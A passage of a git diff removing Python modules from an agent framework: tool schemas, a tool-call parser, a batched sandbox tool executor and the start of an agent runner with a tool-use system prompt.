self._default_height,
)
self.width = max(1, width)
self.height = max(1, height)
self._screen = pyte.Screen(self.width, self.height)
self._stream = pyte.Stream(self._screen)
self._has_header = True
def _apply_event(self, event: list[Any]) -> None:
if len(event) < 2:
return
event_type = event[1]
payload = event[2] if len(event) > 2 else ""
if event_type == "o":
if isinstance(payload, str):
self._stream.feed(payload)
elif event_type == "r":
width, height = _parse_resize(payload)
if width and height:
self.width = width
self.height = height
self._screen.resize(width, height)
def _coerce_int(value: Any, default: int) -> int:
try:
return int(value)
except (TypeError, ValueError):
return int(default)
def _parse_resize(payload: Any) -> tuple[int, int]:
if isinstance(payload, str) and "x" in payload:
left, right = payload.lower().split("x", 1)
return _coerce_int(left, 0), _coerce_int(right, 0)
if isinstance(payload, dict):
width = _coerce_int(payload.get("width") or payload.get("columns") or payload.get("cols"), 0)
height = _coerce_int(payload.get("height") or payload.get("rows") or payload.get("lines"), 0)
return width, height
if isinstance(payload, list) and len(payload) >= 2:
return _coerce_int(payload[0], 0), _coerce_int(payload[1], 0)
return 0, 0

View File

@@ -1,31 +0,0 @@
"""
Tool abstractions for atropos-agent.
Provides base Tool class, ToolCall/ToolResult types, and specialized tools.
Kept modules:
- base.py: ToolSchema, ToolCall, ToolResult, Tool ABC, ToolRegistry
- tool_executor.py: Batched execution queue with slot routing
- terminal_stateful_tool.py: Persistent terminal sessions
- tmux_tool.py: Tmux-based streaming terminal
Removed (replaced by hermes-agent equivalents):
- build_registry.py → model_tools.py + toolsets.py
- sandbox_stubs.py → atropos/backends/ execute() methods
- hermes_external_tools.py → environments/agent_loop.py handle_function_call()
- toolset_resolver.py → toolsets.py
"""
from .base import Tool, ToolCall, ToolRegistry, ToolResult, ToolSchema
from .terminal_stateful_tool import TerminalStatefulTool
from .tmux_tool import TmuxTool
__all__ = [
"Tool",
"ToolCall",
"ToolRegistry",
"ToolResult",
"ToolSchema",
"TerminalStatefulTool",
"TmuxTool",
]

View File

@@ -1,423 +0,0 @@
"""
Base Tool abstraction for atropos-agent.
Tools follow a simple pattern:
1. Define schema (name, description, parameters)
2. Implement execute() method
3. Return ToolResult with output/error
Tool calls use Hermes-style XML tags:
<tool_call>{"name": "bash", "arguments": {"command": "ls"}}</tool_call>
"""
import json
import re
import uuid
from abc import ABC, abstractmethod
from dataclasses import dataclass, field
from typing import Any, Dict, List, Literal, Optional
from pydantic import BaseModel, Field
@dataclass
class ToolSchema:
"""JSON Schema for a tool's parameters."""
name: str
description: str
parameters: Dict[str, Any] = field(default_factory=dict)
required: List[str] = field(default_factory=list)
external: bool = False # Whether the tool must be executed via an external ToolServer (secret proxy) and not inside the sandbox.
def to_dict(self) -> Dict[str, Any]:
"""Convert to OpenAI-compatible function schema."""
return {
"type": "function",
"function": {
"name": self.name,
"description": self.description,
"parameters": {
"type": "object",
"properties": self.parameters,
"required": self.required,
},
},
}
def to_prompt_description(self) -> str:
"""Convert to human-readable description for system prompt."""
params_desc = []
for name, spec in self.parameters.items():
req = "(required)" if name in self.required else "(optional)"
desc = spec.get("description", "")
param_type = spec.get("type", "string")
params_desc.append(f" - {name} ({param_type}) {req}: {desc}")
params_str = "\n".join(params_desc) if params_desc else " (no parameters)"
return f"**{self.name}**: {self.description}\nParameters:\n{params_str}"
@dataclass
class ToolCall:
"""A parsed tool call from model output."""
name: str
arguments: Dict[str, Any]
raw_text: str = "" # Original XML/JSON text
uniq_id: str = field(default_factory=lambda: str(uuid.uuid4())) # Unique tool-call id for traceability/reconstruction.
@classmethod
def parse_from_text(cls, text: str) -> List["ToolCall"]:
"""
Extract tool calls from text using Hermes-style XML tags.
Supported formats (STRICT: requires well-formed closing tags):
- Hermes JSON wrapper:
<tool_call>{"name": "...", "arguments": {...}}</tool_call>
- GLM/llama.cpp style:
<tool_call>terminal{"command":"ls -la"}</tool_call>
"""
calls: List["ToolCall"] = []
if not text:
return calls
def _append_from_payload(*, name: str, arguments: Dict[str, Any], raw: str, uniq_id: Optional[str] = None) -> None:
if not isinstance(name, str) or not name:
return
if not isinstance(arguments, dict):
return
calls.append(
cls(
name=name,
arguments=arguments,
raw_text=raw,
uniq_id=uniq_id or str(uuid.uuid4()),
)
)
# STRICT parsing: only accept well-formed <tool_call>...</tool_call> blocks.
pattern = r"<tool_call>\s*(.*?)\s*</tool_call>"
for inner in re.findall(pattern, text, re.DOTALL):
cleaned = (inner or "").strip()
if not cleaned:
continue
# Hermes JSON wrapper.
if cleaned.startswith("{"):
try:
data = json.loads(cleaned)
except json.JSONDecodeError:
continue
uniq_id = data.get("uniq_id") or data.get("id") or None
_append_from_payload(
name=data.get("name", ""),
arguments=data.get("arguments", {}),
raw=inner,
uniq_id=uniq_id,
)
continue
# GLM/llama.cpp style: terminal{...}
m = re.match(r"^\s*([A-Za-z0-9_.:\\-]+)\s*(\{.*\})\s*$", cleaned, re.DOTALL)
if not m:
continue
name = m.group(1)
args_text = m.group(2)
try:
args = json.loads(args_text)
except json.JSONDecodeError:
continue
_append_from_payload(name=name, arguments=args, raw=inner)
return calls
@classmethod
def has_tool_call(cls, text: str) -> bool:
"""Check if text contains any tool calls."""
return bool(re.search(r"<tool_call>", text))
@dataclass
class ToolResult:
"""Result from executing a tool."""
success: bool
output: str = ""
error: str = ""
metadata: Dict[str, Any] = field(default_factory=dict)
uniq_id: Optional[str] = None # Should match ToolCall.uniq_id for async execution tracking.
def to_xml(self) -> str:
"""Format as XML for including in conversation."""
data = {
"success": self.success,
"output": self.output,
}
if self.uniq_id:
data["uniq_id"] = self.uniq_id
if self.error:
data["error"] = self.error
if self.metadata:
data["metadata"] = self.metadata
return f"<tool_response>{json.dumps(data)}</tool_response>"
def to_dict(self) -> Dict[str, Any]:
"""Convert to dictionary."""
return {
"success": self.success,
"output": self.output,
"error": self.error,
"metadata": self.metadata,
"uniq_id": self.uniq_id,
}
class Tool(ABC):
"""
Abstract base class for tools.
Subclasses must implement:
- schema: ToolSchema describing the tool
- execute(): async method that performs the tool action
"""
@property
@abstractmethod
def schema(self) -> ToolSchema:
"""Return the tool's schema."""
pass
@property
def name(self) -> str:
"""Tool name (from schema)."""
return self.schema.name
@abstractmethod
async def execute(self, **kwargs) -> ToolResult:
"""
Execute the tool with given arguments.
Args:
**kwargs: Tool-specific arguments
Returns:
ToolResult with success/failure and output
"""
pass
def is_available(self) -> tuple[bool, str | None]:
"""
Return whether this tool should be exposed/executable in the current process.
Tools that depend on optional binaries/services/env vars can override this
to avoid advertising a tool that will fail at runtime.
"""
return True, None
async def __call__(self, **kwargs) -> ToolResult:
"""Allow calling tool instance directly."""
return await self.execute(**kwargs)
# Note: This is only wrapping declarations for the external ToolServer (for execution on external process tools), and tools preinstalled in envs
class ToolRegistry:
"""Registry of available tools."""
def __init__(self):
self._tools: Dict[str, Tool] = {}
def register(self, tool: Tool) -> None:
"""Register a tool."""
self._tools[tool.name] = tool
def get(self, name: str) -> Optional[Tool]:
"""Get a tool by name."""
return self._tools.get(name)
def list_tools(self) -> List[Tool]:
"""List all registered tools."""
return list(self._tools.values())
def get_schemas(self) -> List[ToolSchema]:
"""Get schemas for all registered tools."""
return [tool.schema for tool in self._tools.values()]
def get_prompt_description(self) -> str:
"""Generate tool descriptions for system prompt."""
descriptions = [tool.schema.to_prompt_description() for tool in self._tools.values()]
return "\n\n".join(descriptions)
def get_prompt_tool_definitions_json(self) -> str:
"""
Return a Hermes-style JSON list of tool definitions for use inside a `<tools>...</tools>` block.
Hermes trajectories historically use a simplified schema list:
[{"name": ..., "description": ..., "parameters": {...}, "required": null}, ...]
"""
formatted: List[Dict[str, Any]] = []
for tool in self._tools.values():
fn = tool.schema.to_dict().get("function", {})
formatted.append(
{
"name": fn.get("name", tool.name),
"description": fn.get("description", ""),
"parameters": fn.get("parameters", {}),
# Keep parity with Hermes saved trajectories (required is typically null there).
"required": None,
}
)
return json.dumps(formatted, ensure_ascii=False)
async def execute(self, call: ToolCall) -> ToolResult:
"""Execute a tool call."""
tool = self.get(call.name)
if tool is None:
return ToolResult(
success=False,
error=f"Unknown tool: {call.name}",
uniq_id=call.uniq_id,
)
try:
result = await tool.execute(**call.arguments)
if result.uniq_id is None:
result.uniq_id = call.uniq_id
return result
except Exception as e:
return ToolResult(
success=False,
error=f"Tool execution error: {str(e)}",
uniq_id=call.uniq_id,
)
# =============================================================================
# FastAPI / transport models
# =============================================================================
class ToolCallPayload(BaseModel):
name: str
arguments: Dict[str, Any] = Field(default_factory=dict)
uniq_id: str
@classmethod
def from_tool_call(cls, call: ToolCall) -> "ToolCallPayload":
return cls(name=call.name, arguments=call.arguments, uniq_id=call.uniq_id)
def to_tool_call(self) -> ToolCall:
return ToolCall(name=self.name, arguments=self.arguments, uniq_id=self.uniq_id)
class ToolResultPayload(BaseModel):
success: bool
output: str = ""
error: str = ""
metadata: Dict[str, Any] = Field(default_factory=dict)
uniq_id: Optional[str] = None
@classmethod
def from_tool_result(cls, result: ToolResult) -> "ToolResultPayload":
return cls(
success=result.success,
output=result.output,
error=result.error,
metadata=result.metadata,
uniq_id=result.uniq_id,
)
def to_tool_result(self) -> ToolResult:
return ToolResult(
success=self.success,
output=self.output,
error=self.error,
metadata=self.metadata,
uniq_id=self.uniq_id,
)
class ToolExecutorExecuteRequest(BaseModel):
trajectory_id: str
tool: ToolCallPayload
timeout_s: Optional[float] = None
class ToolExecutorReleaseRequest(BaseModel):
trajectory_id: str
reset_workspace: bool = False
class ToolServerExecuteRequest(BaseModel):
trajectory_id: Optional[str] = None
tool: ToolCallPayload
timeout_s: Optional[float] = None
# Optional sandbox context for tools that need workspace artifacts.
# This is set by ToolExecutor and is NOT model-controlled.
slot_id: Optional[str] = None
container_addr: Optional[str] = None
# =============================================================================
# Artifact transport models
# =============================================================================
class ArtifactReadRequestPayload(BaseModel):
trajectory_id: str
path: str
encoding: Literal["text", "base64"] = "text"
max_bytes: Optional[int] = None
include_sha256: bool = False
class ArtifactReadResponsePayload(BaseModel):
success: bool
content: str = ""
error: str = ""
encoding: str = "text"
truncated: bool = False
bytes: int = 0
file_size: Optional[int] = None
path: str = ""
mime: Optional[str] = None
sha256: Optional[str] = None
class ArtifactListRequestPayload(BaseModel):
trajectory_id: str
path: str = "."
recursive: bool = False
max_entries: Optional[int] = None
class ArtifactListEntryPayload(BaseModel):
path: str
is_dir: bool
size: int
mtime: float
class ArtifactListResponsePayload(BaseModel):
success: bool
entries: List[ArtifactListEntryPayload] = Field(default_factory=list)
truncated: bool = False
error: str = ""
class ArtifactArchiveRequestPayload(BaseModel):
trajectory_id: str
path: str = "."
format: Literal["tar.gz", "tgz"] = "tar.gz"
max_bytes: Optional[int] = None
max_entries: Optional[int] = None
class ArtifactArchiveResponsePayload(BaseModel):
success: bool
content: str = ""
error: str = ""
encoding: str = "base64"
format: str = "tar.gz"
bytes: int = 0
entry_count: int = 0

View File

@@ -1,45 +0,0 @@
"""
Stateful terminal tool schema.
This is a sandbox tool that routes to the sandbox server as `bash_stateful`
via ToolExecutor mapping. It exists to expose an explicit, opt-in terminal
primitive suitable for stateful workflows (e.g. tmux sessions / TUIs).
"""
from __future__ import annotations
from typing import Optional
from .base import Tool, ToolResult, ToolSchema
class TerminalStatefulTool(Tool):
@property
def schema(self) -> ToolSchema:
return ToolSchema(
name="terminal_stateful",
description=(
"Execute a command in the sandbox, allowing stateful/background processes to persist "
"across tool calls within the same trajectory slot (e.g. tmux sessions). "
"Use sparingly; output is still non-interactive."
),
parameters={
"command": {"type": "string", "description": "The command to execute"},
"timeout": {
"type": "integer",
"description": "Command timeout in seconds (optional).",
"minimum": 1,
},
},
required=["command"],
)
def is_available(self) -> tuple[bool, str | None]:
return True, None
async def execute(self, command: str, timeout: Optional[int] = None) -> ToolResult:
_ = (command, timeout)
return ToolResult(
success=False,
error="terminal_stateful must be executed via ToolExecutor inside the sandbox",
)

View File

@@ -1,89 +0,0 @@
"""
tmux tool schema (sandbox).
This is a sandbox tool that provides basic tmux session control suitable for
TUI-style terminal interactions:
- send keys (arrow keys, enter, etc.)
- capture the current screen buffer
Execution is routed by ToolExecutor to the sandbox server's `tmux` backend.
"""
from __future__ import annotations
from typing import Any, Dict, Optional
from .base import Tool, ToolResult, ToolSchema
class TmuxTool(Tool):
@property
def schema(self) -> ToolSchema:
return ToolSchema(
name="tmux",
description=(
"Control a per-trajectory tmux session inside the sandbox (stateful terminal). "
"Use this for TUI-style interactions: send keys and capture the current screen."
),
parameters={
"action": {
"type": "string",
"description": "Action to perform: start | send_keys | stream | stop.",
"enum": ["start", "send_keys", "stream", "stop", "capture"],
},
"keys": {
"description": "Keys to send (string or list of strings) when action=send_keys.",
},
"block": {
"type": "boolean",
"description": "If true, wait for shell command completion (only valid at a shell prompt).",
"default": False,
},
"min_wait_s": {
"type": "number",
"description": "For non-blocking send_keys, sleep this long after sending keys (seconds).",
"default": 0.0,
},
"max_wait_s": {
"type": "number",
"description": "For blocking send_keys, max time to wait for completion (seconds).",
},
"capture_entire": {
"type": "boolean",
"description": "Deprecated. Streaming is preferred.",
"default": False,
},
"max_bytes": {
"type": "integer",
"description": "Max bytes to return per stream call.",
},
"reset": {
"type": "boolean",
"description": "If true, reset stream offset to the beginning of the asciinema recording.",
"default": False,
},
"pane_width": {
"type": "integer",
"description": "Pane width for action=start (columns).",
"minimum": 20,
},
"pane_height": {
"type": "integer",
"description": "Pane height for action=start (rows).",
"minimum": 10,
},
},
required=["action"],
)
def is_available(self) -> tuple[bool, str | None]:
return True, None
async def execute(self, **kwargs: Dict[str, Any]) -> ToolResult:
# This tool is intended to be executed via ToolExecutor -> sandbox server.
# We keep a safe fallback for non-sandbox contexts.
action = str(kwargs.get("action") or "").strip()
return ToolResult(
success=False,
error=f"tmux tool must be executed in the sandbox (got action={action!r})",
)

View File

@@ -1,500 +0,0 @@
"""
ToolExecutor - queued, batched tool dispatch for multiplexed agent trajectories.
This component is responsible for:
- Maintaining trajectory -> Slot affinity (workspace continuity)
- Batching sandbox tool calls across trajectories to maximize container utilization
- Routing external tools (ToolSchema.external=True) to a ToolServer (Phase 4.5)
For now, only sandbox tools are executed:
- bash
- read_file
- write_file
"""
from __future__ import annotations
import asyncio
import time
from dataclasses import dataclass
from typing import Any, Dict, List, Optional
import httpx
from .base import (
ArtifactArchiveRequestPayload,
ArtifactArchiveResponsePayload,
ArtifactListRequestPayload,
ArtifactListResponsePayload,
ArtifactReadRequestPayload,
ArtifactReadResponsePayload,
ToolCall,
ToolCallPayload,
ToolRegistry,
ToolResult,
ToolResultPayload,
ToolServerExecuteRequest,
)
from ..backends.base import ToolBackend
from ..slots import Slot
@dataclass
class ToolExecutorConfig:
batch_window_ms: int = 20
max_batch_size: int = 200
allow_network: bool = True
require_sandbox: bool = False
require_stateful_sandbox: bool = False
tool_server_url: Optional[str] = None
tool_server_token: Optional[str] = None
@dataclass
class _QueuedToolRequest:
trajectory_id: str
call: ToolCall
timeout_s: Optional[float]
future: asyncio.Future
class ToolExecutor:
def __init__(
self,
backend: ToolBackend,
tools: ToolRegistry,
config: Optional[ToolExecutorConfig] = None,
) -> None:
self.backend = backend
self.tools = tools
self.config = config or ToolExecutorConfig()
self._queue: asyncio.Queue[Optional[_QueuedToolRequest]] = asyncio.Queue()
self._task: Optional[asyncio.Task] = None
self._stopping = asyncio.Event()
self._slots_lock = asyncio.Lock()
self._slot_by_trajectory: Dict[str, Slot] = {}
self._tool_server_client: Optional[httpx.AsyncClient] = None
self._tool_server_lock = asyncio.Lock()
# lightweight stats for status endpoints
self.total_requests: int = 0
self.total_errors: int = 0
self.latencies_s: List[float] = []
async def start(self) -> None:
if self._task is None:
self._task = asyncio.create_task(self._run_loop())
def queue_size(self) -> int:
return self._queue.qsize()
async def close(self) -> None:
self._stopping.set()
await self._queue.put(None)
if self._task:
await self._task
self._task = None
client = self._tool_server_client
self._tool_server_client = None
if client is not None:
await client.aclose()
# Best-effort release any remaining slots.
async with self._slots_lock:
slots = list(self._slot_by_trajectory.items())
self._slot_by_trajectory.clear()
for _, slot in slots:
try:
await self.backend.release(slot, reset_workspace=False)
except Exception:
pass
async def execute(
self,
trajectory_id: str,
call: ToolCall,
timeout_s: Optional[float] = None,
) -> ToolResult:
if self._task is None:
raise RuntimeError("ToolExecutor not started (call start() first)")
# Allow tool args to suggest a timeout (Hermes-compatible terminal tool),
# but never let the model choose "infinite" timeouts.
if timeout_s is None:
raw_timeout = call.arguments.get("timeout")
if isinstance(raw_timeout, (int, float)):
timeout_s = float(raw_timeout)
if timeout_s is not None:
timeout_s = max(1.0, min(float(timeout_s), 600.0))
loop = asyncio.get_running_loop()
fut: asyncio.Future = loop.create_future()
started = time.perf_counter()
await self._queue.put(_QueuedToolRequest(trajectory_id=trajectory_id, call=call, timeout_s=timeout_s, future=fut))
try:
result: ToolResult = await fut
return result
finally:
self.latencies_s.append(time.perf_counter() - started)
async def release_trajectory(self, trajectory_id: str, reset_workspace: bool = False) -> None:
async with self._slots_lock:
slot = self._slot_by_trajectory.pop(trajectory_id, None)
if slot is not None:
await self.backend.release(slot, reset_workspace=reset_workspace)
async def _get_slot_if_present(self, trajectory_id: str) -> Optional[Slot]:
async with self._slots_lock:
return self._slot_by_trajectory.get(trajectory_id)
# ---------------------------------------------------------------------
# Artifact helpers (optional)
# ---------------------------------------------------------------------
async def read_artifact(self, req: ArtifactReadRequestPayload) -> ArtifactReadResponsePayload:
slot = await self._get_slot_if_present(req.trajectory_id)
if slot is None:
return ArtifactReadResponsePayload(success=False, error="No active slot for trajectory (run a sandbox tool first)")
data = await self.backend.read_artifact(
slot,
req.path,
encoding=req.encoding,
max_bytes=req.max_bytes,
include_sha256=req.include_sha256,
)
if isinstance(data, dict):
data = dict(data)
data.pop("http_status", None)
try:
return ArtifactReadResponsePayload(**(data or {}))
except Exception as e:
return ArtifactReadResponsePayload(success=False, error=f"Invalid artifact read response: {e}")
async def list_artifacts(self, req: ArtifactListRequestPayload) -> ArtifactListResponsePayload:
slot = await self._get_slot_if_present(req.trajectory_id)
if slot is None:
return ArtifactListResponsePayload(success=False, error="No active slot for trajectory (run a sandbox tool first)")
data = await self.backend.list_artifacts(
slot,
req.path,
recursive=req.recursive,
max_entries=req.max_entries,
)
if isinstance(data, dict):
data = dict(data)
data.pop("http_status", None)
try:
return ArtifactListResponsePayload(**(data or {}))
except Exception as e:
return ArtifactListResponsePayload(success=False, error=f"Invalid artifact list response: {e}")
async def archive_artifacts(self, req: ArtifactArchiveRequestPayload) -> ArtifactArchiveResponsePayload:
slot = await self._get_slot_if_present(req.trajectory_id)
if slot is None:
return ArtifactArchiveResponsePayload(success=False, error="No active slot for trajectory (run a sandbox tool first)")
data = await self.backend.archive_artifacts(
slot,
req.path,
archive_format=req.format,
max_bytes=req.max_bytes,
max_entries=req.max_entries,
)
if isinstance(data, dict):
data = dict(data)
data.pop("http_status", None)
try:
return ArtifactArchiveResponsePayload(**(data or {}))
except Exception as e:
return ArtifactArchiveResponsePayload(success=False, error=f"Invalid artifact archive response: {e}")
async def _get_or_acquire_slot(self, trajectory_id: str) -> Slot:
async with self._slots_lock:
existing = self._slot_by_trajectory.get(trajectory_id)
if existing is not None:
return existing
slot = await self.backend.acquire(trajectory_id)
async with self._slots_lock:
existing = self._slot_by_trajectory.get(trajectory_id)
if existing is not None:
# Another coroutine won the race; return its slot.
await self.backend.release(slot, reset_workspace=False)
return existing
self._slot_by_trajectory[trajectory_id] = slot
return slot
async def _run_loop(self) -> None:
pending: List[_QueuedToolRequest] = []
deadline: Optional[float] = None
batch_window_s = max(0.0, self.config.batch_window_ms / 1000.0)
max_batch = max(1, self.config.max_batch_size)
while True:
if self._stopping.is_set() and self._queue.empty() and not pending:
break
timeout = None
if pending and deadline is not None:
timeout = max(0.0, deadline - time.perf_counter())
try:
item = await asyncio.wait_for(self._queue.get(), timeout=timeout)
if item is None:
continue
pending.append(item)
if len(pending) == 1:
deadline = time.perf_counter() + batch_window_s
if len(pending) < max_batch:
continue
except asyncio.TimeoutError:
# batch window elapsed
pass
if not pending:
deadline = None
continue
batch = pending
pending = []
deadline = None
await self._execute_batch(batch)
async def _get_tool_server_client(self) -> httpx.AsyncClient:
url = self.config.tool_server_url
if not url:
raise RuntimeError("ToolServer not configured")
if self._tool_server_client is not None:
return self._tool_server_client
async with self._tool_server_lock:
if self._tool_server_client is None:
self._tool_server_client = httpx.AsyncClient(base_url=url.rstrip("/"))
return self._tool_server_client
def _tool_server_headers(self) -> Dict[str, str]:
token = self.config.tool_server_token
if not token:
return {}
return {"Authorization": f"Bearer {token}"}
async def _execute_external(self, req: _QueuedToolRequest) -> ToolResult:
client = await self._get_tool_server_client()
slot_id: Optional[str] = None
container_addr: Optional[str] = None
slot = await self._get_slot_if_present(req.trajectory_id)
if slot is not None:
slot_id = slot.slot_id
container_addr = slot.container_addr
payload = ToolServerExecuteRequest(
trajectory_id=req.trajectory_id,
tool=ToolCallPayload.from_tool_call(req.call),
timeout_s=req.timeout_s,
slot_id=slot_id,
container_addr=container_addr,
)
try:
resp = await client.post(
"/execute",
json=payload.model_dump(),
headers=self._tool_server_headers(),
timeout=req.timeout_s,
)
resp.raise_for_status()
data = resp.json()
parsed = ToolResultPayload(**data)
result = parsed.to_tool_result()
if result.uniq_id is None:
result.uniq_id = req.call.uniq_id
return result
except Exception as e:
return ToolResult(
success=False,
error=f"External tool failed: {e}",
uniq_id=req.call.uniq_id,
)
async def _execute_batch(self, batch: List[_QueuedToolRequest]) -> None:
# Resolve tool schemas once per request and separate sandbox/external/unknown.
sandbox_items: List[_QueuedToolRequest] = []
external_items: List[_QueuedToolRequest] = []
unknown_items: List[_QueuedToolRequest] = []
for it in batch:
tool = self.tools.get(it.call.name)
if tool is None:
unknown_items.append(it)
continue
schema = tool.schema
if not schema.external:
sandbox_items.append(it)
else:
external_items.append(it)
for it in unknown_items:
self.total_requests += 1
self.total_errors += 1
if not it.future.done():
it.future.set_result(
ToolResult(
success=False,
error=f"Unknown tool: {it.call.name}",
uniq_id=it.call.uniq_id,
)
)
if external_items:
if not self.config.tool_server_url:
for it in external_items:
self.total_requests += 1
self.total_errors += 1
if not it.future.done():
it.future.set_result(
ToolResult(
success=False,
error=f"External tool not available (ToolServer not configured): {it.call.name}",
uniq_id=it.call.uniq_id,
)
)
else:
results = await asyncio.gather(*[self._execute_external(it) for it in external_items])
for it, res in zip(external_items, results):
self.total_requests += 1
if not getattr(res, "success", False):
self.total_errors += 1
if not it.future.done():
it.future.set_result(res)
if not sandbox_items:
return
# Acquire slots for the distinct trajectories in this batch.
try:
traj_ids = list({it.trajectory_id for it in sandbox_items})
slots = await asyncio.gather(*[self._get_or_acquire_slot(tid) for tid in traj_ids])
slot_by_traj = dict(zip(traj_ids, slots))
except Exception as e:
for it in sandbox_items:
self.total_requests += 1
self.total_errors += 1
if not it.future.done():
it.future.set_result(
ToolResult(
success=False,
error=f"Failed to acquire slot: {e}",
uniq_id=it.call.uniq_id,
)
)
return
# Group by timeout so we don't accidentally make short timeouts wait on long ones.
by_timeout: Dict[float, List[_QueuedToolRequest]] = {}
default_timeout = self.backend.default_timeout_s
for it in sandbox_items:
t = it.timeout_s
if t is None:
t = default_timeout
if t is None:
t = 30.0
by_timeout.setdefault(float(t), []).append(it)
for timeout_s, items in by_timeout.items():
requests = []
dispatched: List[_QueuedToolRequest] = []
for it in items:
slot = slot_by_traj[it.trajectory_id]
tool_name = it.call.name
args = dict(it.call.arguments)
# Hermes compatibility: treat `terminal` as an alias of sandbox `bash`.
if tool_name == "terminal":
if args.get("background"):
self.total_requests += 1
self.total_errors += 1
if not it.future.done():
it.future.set_result(
ToolResult(
success=False,
error="terminal background execution is not supported in sandbox",
uniq_id=it.call.uniq_id,
)
)
continue
tool_name = "bash"
# `timeout` is handled at the ToolExecutor level, not passed to the sandbox tool args.
args.pop("timeout", None)
elif tool_name == "terminal_stateful":
tool_name = "bash_stateful"
args.pop("timeout", None)
elif tool_name == "tmux":
# `tmux` is a sandbox tool backed by the stateful session manager.
# Network policy is env-controlled.
args.pop("allow_network", None)
if tool_name == "bash":
# Network policy is set by the environment/executor, not by the model.
args.pop("allow_network", None)
args.pop("require_sandbox", None)
args["allow_network"] = bool(self.config.allow_network)
args["require_sandbox"] = bool(self.config.require_sandbox)
# `timeout` is handled at the ToolExecutor level, not passed to the sandbox tool args.
args.pop("timeout", None)
elif tool_name == "bash_stateful":
# Network policy is set by the environment/executor, not by the model.
args.pop("allow_network", None)
args.pop("require_sandbox", None)
args.pop("require_stateful_sandbox", None)
args["allow_network"] = bool(self.config.allow_network)
args["require_stateful_sandbox"] = bool(self.config.require_stateful_sandbox)
args.pop("timeout", None)
elif tool_name == "tmux":
# Network policy applies to the underlying stateful session.
args.pop("allow_network", None)
args.pop("require_sandbox", None)
args.pop("require_stateful_sandbox", None)
args["allow_network"] = bool(self.config.allow_network)
args["require_stateful_sandbox"] = bool(self.config.require_stateful_sandbox)
requests.append((slot, tool_name, args))
dispatched.append(it)
results = None
try:
if not dispatched:
continue
results = await self.backend.execute_batch(requests, timeout_s=timeout_s)
except Exception as e:
for it in items:
self.total_requests += 1
self.total_errors += 1
if not it.future.done():
it.future.set_result(
ToolResult(
success=False,
error=f"Batch execution failed: {e}",
uniq_id=it.call.uniq_id,
)
)
continue
for it, res in zip(dispatched, results):
self.total_requests += 1
if not getattr(res, "success", False):
self.total_errors += 1
tool_result = res.to_tool_result()
tool_result.uniq_id = it.call.uniq_id
if not it.future.done():
it.future.set_result(tool_result)

View File

@@ -1,415 +0,0 @@
#!/usr/bin/env python3
"""
Atropos-compatible Hermes agent runner.
This is a minimal subclass of Hermes-Agent's `AIAgent` that swaps the OpenAI
function-calling backend for Atroposlib's `ManagedServer`/`ServerManager` backend
and uses Hermes-style XML tool tags:
- <tool_call>{"name": "...", "arguments": {...}}</tool_call>
- <tool_response>{...}</tool_response>
Tool observations are appended as `role="user"` messages containing one or more
`<tool_response>` blocks so they survive common chat templates during tokenization.
"""
from __future__ import annotations
import asyncio
import json
import re
import time
import warnings
import os
from contextlib import asynccontextmanager
from typing import Any, AsyncGenerator, Dict, List, Optional, Tuple
from model_tools import cleanup_vm, handle_function_call
from run_agent import AIAgent
_TOOL_CALL_RE = re.compile(r"<tool_call>\\s*(.*?)\\s*</tool_call>", re.DOTALL)
ATROPOS_TOOL_SYSTEM_PROMPT = """You are a helpful AI assistant with access to tools.
## Available Tools
<tools>
{tool_descriptions}
</tools>
## How to Use Tools
To call a tool, output:
<tool_call>{{"name": "tool_name", "arguments": {{"arg1": "value1"}}}}</tool_call>
You may include optional reasoning in <think>...</think> before tool calls.
After each tool call, you will receive tool results as:
<tool_response>{{...}}</tool_response>
Continue until finished, then provide a final response with no <tool_call> blocks.
"""
class AtroposAIAgent(AIAgent):
"""
Hermes `AIAgent` variant that uses Atroposlib ServerManager/ManagedServer.
Notes:
- The default Hermes `AIAgent` remains unchanged; this class is opt-in.
- The underlying server must expose `managed_server(tokenizer=...)` OR be a single
APIServer-compatible object usable by Atroposlib's `ManagedServer`.
"""
def __init__(
self,
*,
server: Any,
tokenizer: Any = None,
model: str = "local",
max_iterations: int = 10,
tool_delay: float = 0.0,
enabled_toolsets: Optional[List[str]] = None,
disabled_toolsets: Optional[List[str]] = None,
save_trajectories: bool = False,
verbose_logging: bool = False,
quiet_mode: bool = False,
ephemeral_system_prompt: Optional[str] = None,
log_prefix_chars: int = 100,
log_prefix: str = "",
session_id: Optional[str] = None,
temperature: Optional[float] = None,
max_tokens: Optional[int] = None,
):
# Call parent init mainly to reuse tool selection + trajectory saving utilities.
super().__init__(
base_url="http://unused",
api_key="dummy-key",
model=model,
max_iterations=max_iterations,
tool_delay=tool_delay,
enabled_toolsets=enabled_toolsets,
disabled_toolsets=disabled_toolsets,
save_trajectories=save_trajectories,
verbose_logging=verbose_logging,
quiet_mode=quiet_mode,
ephemeral_system_prompt=ephemeral_system_prompt,
log_prefix_chars=log_prefix_chars,
log_prefix=log_prefix,
session_id=session_id,
)
self.server = server
self.tokenizer = tokenizer
self.temperature = temperature
self.max_tokens = max_tokens
@asynccontextmanager
async def _managed(self) -> AsyncGenerator[Any, None]:
if hasattr(self.server, "managed_server"):
with warnings.catch_warnings():
warnings.filterwarnings(
"ignore",
message=r"Using OpenAIServer with managed_server does not allow for state tracking",
category=UserWarning,
)
async with self.server.managed_server(tokenizer=self.tokenizer) as managed:
yield managed
return
# Fall back to directly wrapping a single server object.
from atroposlib.envs.server_handling.managed_server import ManagedServer
managed = ManagedServer(server=self.server, tokenizer=self.tokenizer)
try:
yield managed
finally:
managed.reset()
def _tool_descriptions_text(self) -> str:
if not self.tools:
return "(no tools available)"
parts: List[str] = []
for tool in self.tools:
fn = (tool or {}).get("function", {})
name = fn.get("name", "")
desc = (fn.get("description") or "").strip()
if not name:
continue
if desc:
parts.append(f"- {name}: {desc}")
else:
parts.append(f"- {name}")
return "\n".join(parts) if parts else "(no tools available)"
def _build_system_prompt(self, system_message: Optional[str]) -> Optional[str]:
tool_prompt = ATROPOS_TOOL_SYSTEM_PROMPT.format(
tool_descriptions=self._tool_descriptions_text()
)
parts: List[str] = []
if system_message:
parts.append(system_message)
if self.ephemeral_system_prompt:
parts.append(self.ephemeral_system_prompt)
parts.append(tool_prompt)
return "\n\n".join(parts)
def _parse_tool_calls(self, content: str) -> Tuple[List[Tuple[str, Dict[str, Any]]], List[str]]:
"""
Returns:
(calls, errors)
"""
calls: List[Tuple[str, Dict[str, Any]]] = []
errors: List[str] = []
for raw in _TOOL_CALL_RE.findall(content or ""):
try:
payload = json.loads(raw)
except json.JSONDecodeError as exc:
errors.append(f"Invalid JSON inside <tool_call>: {exc}")
continue
name = payload.get("name")
args = payload.get("arguments", {})
if not isinstance(name, str) or not name:
